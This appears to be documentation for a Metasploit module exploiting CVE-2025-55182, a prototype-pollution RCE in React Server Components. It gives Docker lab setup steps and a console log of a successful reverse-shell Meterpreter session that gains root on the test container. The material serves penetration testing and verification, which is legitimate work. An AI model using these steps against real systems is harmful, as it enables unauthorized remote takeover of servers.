vognik
1.6 KiB
1.6 KiB
Vulnerable Application
A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "proto", "constructor", or "prototype" as module names.
Testing
- Open
data\exploits\react2shell_cve_2025_55182directory - Build
docker build -t react2shell .
- Run
docker run -p 3000:3000 react2shell
- Open http://127.0.0.1:3000/ and make sure the app is available
Scenario
msf6 > use multi/http/react2shell_cve_2025_55182_scanner
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 172.17.0.1
RHOSTS => 172.17.0.1
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.17.0.1:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:6666 -> 172.17.0.2:59608) at 2025-12-05 01:12:48 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.2
OS : (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux